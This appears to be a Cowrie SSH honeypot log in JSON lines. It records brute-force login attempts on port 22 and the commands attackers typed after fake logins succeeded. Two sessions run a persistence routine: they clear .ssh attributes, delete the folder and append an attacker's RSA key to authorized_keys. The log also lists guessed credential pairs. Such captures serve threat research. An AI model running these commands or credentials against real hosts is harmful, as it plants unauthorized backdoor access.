{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:03.681157Z","src_ip":"134.199.174.250","session":"52d363cf730b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53872,"dst_ip":"1.2.3.4","dst_port":22,"session":"92381196b46f","protocol":"ssh","message":"New connection: 212.227.235.229:53872 (1.2.3.4:22) [session: 92381196b46f]","sensor":"my-vps","timestamp":"2025-09-08T13:55:31.979131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:31.980141Z","src_ip":"212.227.235.229","session":"92381196b46f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:32.088736Z","src_ip":"212.227.235.229","session":"92381196b46f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":59750,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c5e074e7ca2","protocol":"ssh","message":"New connection: 134.199.174.250:59750 (1.2.3.4:22) [session: 4c5e074e7ca2]","sensor":"my-vps","timestamp":"2025-09-08T13:55:32.350597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:55:32.351271Z","src_ip":"134.199.174.250","session":"4c5e074e7ca2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:55:32.642444Z","src_ip":"134.199.174.250","session":"4c5e074e7ca2"}
{"eventid":"cowrie.login.failed","username":"nikhil","password":"nikhil","message":"login attempt [nikhil/nikhil] failed","sensor":"my-vps","timestamp":"2025-09-08T13:55:32.677441Z","src_ip":"212.227.235.229","session":"92381196b46f"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123","message":"login attempt [webmaster/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:55:33.518274Z","src_ip":"134.199.174.250","session":"4c5e074e7ca2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:33.781934Z","src_ip":"212.227.235.229","session":"92381196b46f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:34.816099Z","src_ip":"134.199.174.250","session":"4c5e074e7ca2"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":9722,"dst_ip":"1.2.3.4","dst_port":22,"session":"bef65bc439a3","protocol":"ssh","message":"New connection: 49.247.35.31:9722 (1.2.3.4:22) [session: bef65bc439a3]","sensor":"my-vps","timestamp":"2025-09-08T13:55:45.579260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:45.601665Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:45.884321Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Video","message":"login attempt [root/Video] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:55:47.062244Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:55:47.723245Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:55:47.723958Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:55:47.724757Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:48.036842Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:55:48.634618Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:55:48.635310Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:55:48.943956Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:48.944772Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":49850,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa9a175950c0","protocol":"ssh","message":"New connection: 49.247.35.31:49850 (1.2.3.4:22) [session: fa9a175950c0]","sensor":"my-vps","timestamp":"2025-09-08T13:55:49.234243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:49.238312Z","src_ip":"49.247.35.31","session":"fa9a175950c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:49.521271Z","src_ip":"49.247.35.31","session":"fa9a175950c0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:55:50.699714Z","src_ip":"49.247.35.31","session":"fa9a175950c0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:52.001465Z","src_ip":"49.247.35.31","session":"fa9a175950c0"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":18558,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d4284e7eaf3","protocol":"ssh","message":"New connection: 49.247.35.31:18558 (1.2.3.4:22) [session: 7d4284e7eaf3]","sensor":"my-vps","timestamp":"2025-09-08T13:55:52.283517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:52.294008Z","src_ip":"49.247.35.31","session":"7d4284e7eaf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:52.581824Z","src_ip":"49.247.35.31","session":"7d4284e7eaf3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:55:53.741883Z","src_ip":"49.247.35.31","session":"7d4284e7eaf3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:54.044068Z","src_ip":"49.247.35.31","session":"7d4284e7eaf3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:54.044933Z","src_ip":"49.247.35.31","session":"bef65bc439a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56500,"dst_ip":"1.2.3.4","dst_port":22,"session":"c13ed7991253","protocol":"ssh","message":"New connection: 212.227.235.229:56500 (1.2.3.4:22) [session: c13ed7991253]","sensor":"my-vps","timestamp":"2025-09-08T13:55:55.953869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:55.954550Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:56.080875Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf.1234","message":"login attempt [root/asdf.1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:55:56.624119Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:55:56.931520Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:55:56.932227Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:55:56.933124Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.059493Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:55:57.368692Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.369476Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.498888Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.499822Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56508,"dst_ip":"1.2.3.4","dst_port":22,"session":"10e8c267bd14","protocol":"ssh","message":"New connection: 212.227.235.229:56508 (1.2.3.4:22) [session: 10e8c267bd14]","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.629446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.630307Z","src_ip":"212.227.235.229","session":"10e8c267bd14"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:57.775944Z","src_ip":"212.227.235.229","session":"10e8c267bd14"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:55:58.334742Z","src_ip":"212.227.235.229","session":"10e8c267bd14"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:55:59.465436Z","src_ip":"212.227.235.229","session":"10e8c267bd14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56520,"dst_ip":"1.2.3.4","dst_port":22,"session":"486bdcf6b205","protocol":"ssh","message":"New connection: 212.227.235.229:56520 (1.2.3.4:22) [session: 486bdcf6b205]","sensor":"my-vps","timestamp":"2025-09-08T13:55:59.590244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:55:59.591092Z","src_ip":"212.227.235.229","session":"486bdcf6b205"}
